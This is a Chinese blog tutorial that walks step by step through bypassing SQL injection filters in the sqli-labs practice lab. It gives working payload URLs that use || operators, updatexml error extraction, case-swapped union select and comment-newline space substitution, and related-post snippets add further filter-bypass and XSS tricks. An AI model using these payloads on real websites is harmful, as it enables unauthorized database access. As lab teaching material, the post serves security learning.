mysql查询过滤%符号_小课堂 -- 绕过去除特殊字符的sql注入

最新推荐文章于 2023-08-13 12:24:38 发布
最新推荐文章于 2023-08-13 12:24:38 发布
阅读量771 收藏
点赞数
文章标签: mysql查询过滤%符号
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28932089/article/details/114349544
版权
本文介绍了如何在SQL注入攻击中绕过MySQL的特殊字符过滤,包括在sqli-labs的不同场景下,如Less-25、Less-26和Less-27,使用单引号闭合、逻辑运算符替代、XML函数结合数据库名获取等方法,展示了SQL注入的技巧和防御策略。
摘要由CSDN通过智能技术生成

环境sqli-labs

less 25

1、输入特殊字符,报错

http://192.168.1.121/sqli/Less-25/?id=1\

114547eb0003467f7f6fe0c9921f52b2.png

2、单引号闭合

86034021627bcb8a310c7cbd928ff726.png

3、输入and、or都会被过滤,报错,输入||正常,所以可以判断是大小写过滤

http://192.168.1.121/sqli/Less-25/?id=1' and 1=1 --+

http://192.168.1.121/sqli/Less-25/?id=1' or 1=1 --+

d4871229c849c59947cb5ff518aec2f2.png

http://192.168.1.121/sqli/Less-25/?id=1' || 1=1 --+

92ad5da3efda74f5dc811673162257e9.png

less 26

一、输入特殊字符,看报错信息

http://192.168.1.121/sqli/Less-26/?id=1'

aabbd67aa1404a8547c846ed39794bc3.png

二、闭合语句没有效果,屏蔽了-,空格,or等等

http://192.168.1.121/sqli/Less-26/?id=1' --+

三、重新构造闭合语句

http://192.168.1.121/sqli/Less-26/?id=1' ||'a'='a

3ec84d6e5e14c2e557a775f59fe497f0.png

这样就绕过了去空格

四、获取数据库名称

http://192.168.1.121/sqli/Less-26/?id=1'||updatexml(1,concat('$',(database())),0)||'1'='1

a40fc9a42dea2751bb05a84468ba6274.png

less 27

一、输入特殊字符,报错

http://192.168.1.121/sqli/Less-27/?id=1'

8c3b75c37843a0fc5fc766255e0b104b.png

二、由于过滤了特殊符号,构造如下闭合语句

http://192.168.1.121/sqli/Less-27/?id=1' ||'1

32182875dead75f392d1bd80ff030cf0.png

三、通过union查询

http://192.168.1.121/sqli/Less-27/?id=1' union select 1,2,3 ||'1

8dffb2bdbdf37caf3c12eae40b01c56e.png

union、select屏蔽了,空格也屏蔽了

四、union.select大小写替换一下,空格用/*%0a*/替换

http://192.168.1.121/sqli/Less-27/?id=0'/*%0a*/uniOn/*%0a*/seLect/*%0a*/1,2,3%20||'1

36d29bf04e8fd6c01b6c4812df31cd3e.png

五、获取数据库名称

http://192.168.1.121/sqli/Less-27/?id=0'/*%0a*/uniOn/*%0a*/seLect/*%0a*/1,database(),3||'1

5907758e8b20925932f3eaa27a1b743b.png

禁止非法,后果自负

尼尔呆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL关于特殊字符处理的基本方法.doc
12-21
SQL关于特殊字符处理的基本方法.doc 希望对qsl初学者有所帮助
MYSQL.rar_MYSQL_ROOT_mysql root_root-Cyclic-Music_sql
09-22
shell> mysqladmin -u root -p password ‘newpass’ Enter Password:******* ... 读者可以尝试其它所有本章介绍的方法。...然后发布查询,直接键入题目中的语句: mysql> SELECT User,Host FROM mysql.user
mysql 过滤字符_mysql自动过滤特殊字符的解决方法
weixin_35710005的博客
01-26 1212
mysql会自动过滤特殊字符。像" " "(双引号)、" ' "(单引号)、"\"等都在插入数据的时候被mysql数据库自己过滤了。网上有人使用什么SQL注入,反正我也不懂。我是用的C语言连接数据库,想插入文件路径(包含反斜杠),所以就自己写了一个函数处理要插入的字符串。将字符串里的“\”全改为“\\”。void *convertToDBStr(char *dest, const char *sr...
SQL注入中的特殊字符(未完)
kekefen01的博客
03-04 8030
打算整理一下SQL注入方面的知识,基本所有的SQL书籍都是从select讲起,但是不会提及SQL作为一门完整的程序语言的特点 SQL是一种图灵完备的程序语言 1.SQL对于大小写不敏感,所以可以采用And,aNd绕过一些过滤 2.SQL中的语句用分号隔开 3.mysql中的注释: 单行注释:# , ‘-- ’(注意空格) 多行注释:/* 注释 */ 4.SQL中的单引号:在标准 SQL 中,字符...
Mysql如何批量去掉某一个字段内的特殊字符
Yannis的技术之路
10-16 5679
MYSQL的数据库里可能存在某一字段后面又特殊字符的情况,若明确知道该列可能引入的字符类型,则直接使用替换功能进行替换例如   UPDATE tablename SET field = REPLACE(REPLACE(field, CHAR(10), ”), CHAR(13), ”); char(10): 换行符 char(13): 回车符       但有时候并不...
mysql查询字符串包含%的过滤条件
qq_18871751的博客
12-04 597
JDBC_MYSQL.rar_JDBC-MYSQL_java jdbc mysql_java sql 简单
09-21
- 使用PreparedStatement可以防止SQL注入攻击,并提高查询效率。 7. **事务管理**: - JDBC提供对数据库事务的支持,通过`Connection`对象的`setAutoCommit(false)`来禁用自动提交,然后手动调用`commit()`或`...
sql.rar_MySQLConnection_sqljdbc4-3.0.jar
09-20
标题中的"sql.rar_MySQLConnection_sqljdbc4-3.0.jar"暗示了这是一个与SQL数据库连接相关的资源包,特别是涉及到MySQL和SQL Server的连接。其中,“MySQLConnection”指的是Java程序连接MySQL数据库的方式,而“sql...
amoeba-mysql-1.0.2-BETA.zip_SQL 高并发_mysql-proxy java_代理_分布式java_
09-22
Amoeba属于分布式数据库代理开发框架,专注于分布式数据库 proxy 开发。座落与Client、DB Server(s)...具有负载均衡、高可用性、sql过滤、读写分离、可路由相关的query到目标数据库、可并发请 求多台数据库合并结果。
MySQL-Front_Setup.rar_MySQL Front Setup_MySQL-Front_MySQL-Front_
09-21
通过MySQL-Front,用户可以轻松地进行数据查询、编辑、导入/导出、备份以及创建和管理数据库表等任务,而无需深入理解SQL命令。 MySQL是世界上最流行的开源关系型数据库管理系统之一,广泛应用于各种规模的企业和...
过滤绕过
weixin_53259175的博客
11-19 932
xss=111”%20onerror=location=“javasc”%2b"ript:al"%2b"ert%25281%2529 可以看出弹窗实现,这里使用了字符串拼接的方法进行了关键字的绕过。其中%2b是字符+的url编码,js中的字符拼接也是使用+字符来实现的。xss=111"%20onerror=location=“javasc”%2b"ript:prompt%25281%2529 可以发现弹窗也可以实现,这里使用了其他的弹窗方法绕过,所以也可以使用其他未过滤且功能相同的方法来绕过
SQL注入遇到过滤,二次注入
最新发布
qq_61412565的博客
08-13 1097
SQL注入总不能一帆风顺,对面有时候会有一些防御,过安全狗宝塔那些先且不谈,就是过滤注释符号的时候。(新注意到一个知识点,get传参有urf编码,而post没有)应对方法有:因为注释符不起效,所以灵活用or,构造 or '1' ='1,来把后面的’给过滤掉,(但这是知道靶场源码做出来的方式,实战怎么搞呢)。上面一步是默认把字符型数字型测出来了,那么要记得该测列数和回显位了(这里居然忘了该有这步,真是不器用),以前常规的做法是 and order by 1234,这样不停换数字看他报错的嘛。
mysql登录密码特殊字符处理
weixin_30919571的博客
10-13 2196
mysql -h 192.168.12.23 -u root -pClz_b1qYPyl6$Zu1 登录报错 mysql -h 192.168.12.23-u root -pClz_b1qYPyl6\$Zu1 将特殊字符$加上斜杠转义\$ 即可 转载于:https://www.cnblogs.com/cocoat/p/7661365.html...
sql注入过滤了#,--+怎么办
weixin_30673715的博客
11-26 1761
题目是NCTF2018的web题目 第一段是错误的思路,第二段是晚上有思考后发现的直接看第二段吧。 ① ?id=1'会直接出来报错提示。 猜测使用单引号保护id。 另外一打空格就提示you hacker,空格在尾部是不会提示的,猜测用了去除尾部的空格的函数trim()。 空格的过滤绕过 %20 %09 %0a %0b %0c %0d %a0 %00 /**/ () 挨个试就行,最好不...
对字符进行修改从而绕过
E1even的博客
12-24 230
基于代码审计和部分sql相关的绕过: or || % ^ 0b ~~ 题目类型如下: 以下分为6个方式来讨论该类型: 第一题:无绕过 对代码进行分析:需要GET一个ID<999的参数,但是flag需要id=1000才能获取。这里我们还可以看到他执行的是SQL语句,因此大概率是SQL注入。 我们随便输入一些ID的值得到以下内容: ID=1 ID=2 为什么ID=2之后都没有结果呢?当然是因为数据库里面查询不到这个值,而学习过SQL注入的同学应该知道,order by 字段与 union selec
墨者学院—SQL过滤字符后手工注入漏洞测试
没事我溜达
03-16 1205
靶场地址: SQL过滤字符后手工注入漏洞测试(第1题)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 关于CTFHUB中的sql注入以及文件上传知识点我们已经学习过一遍了,如果大家都掌握的话,那我们也算是过了入门这个关了。 今天来学习墨者学院中的字符过滤靶场 我们打开靶场 我们进到靶场看到一个登录页面 看到这我也是很激动呀,打开BP就是一顿爆破,结果没爆破出来.. 然后仔细看到下方有个导航条我我们点进去 注意看这个URL,我就怀疑注入点在这里,然后打开.
mysql括号被过滤_MySQL之数据过滤
weixin_33292780的博客
02-02 665
数据过滤:如何组合WHERE子句以建立功能更强的更高级的搜索条件。还将学习如何使用NOT和IN操作符。1. AND操作符-- AND操作符SELECT vend_id, prod_id, prod_price, prod_nameFROM productsWHERE vend_id = 1003 AND prod_price <= 10;AND: 用在WHERE子句中的关键字,用来指示检索满...
sql注入漏洞
qz362228的博客
08-11 2559
sql注入漏洞原理,类型,防御方式,绕过技巧
SQL注入漏洞(7)SQL注入高级篇
weixin_51339377的博客
03-18 1424
分析目标防火墙并且跳过 1.直接拉黑ip类防火墙 2.过滤删除相应字符的防火墙 1.waf注释符号过滤 例题:Sqli-labs T23 特点:注释符 --+ # 被过滤掉了 绕过方法:逻辑上补全闭合即可 多加一次url编码只是更安全的绕过 select * from users where id = '' limit 0,1 select * from users where id = ' -1' union select 1,2,'3 ' limit 0...
%MYSQL_EXE_PATH% -u %MYSQL_USER% -p%MYSQL_PASSWORD% -h %MYSQL_HOST% -P %MYSQL_PORT% -e "use videodb;"
06-09
这是一个用于连接 MySQL 数据库并切换到名为 "videodb" 的数据库的命令。其中 "%MYSQL_EXE_PATH%" 是 MySQL 安装路径,"%MYSQL_USER%" 是连接 MySQL 数据库时使用的用户名,"%MYSQL_PASSWORD%" 是该用户名对应的密码,"%MYSQL_HOST%" 是 MySQL 数据库所在的主机名或 IP 地址,"%MYSQL_PORT%" 是 MySQL 数据库的端口号。"-e" 参数表示执行指定的 SQL 语句。在本命令中,执行的 SQL 语句为 "use videodb;",即切换到名为 "videodb" 的数据库。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值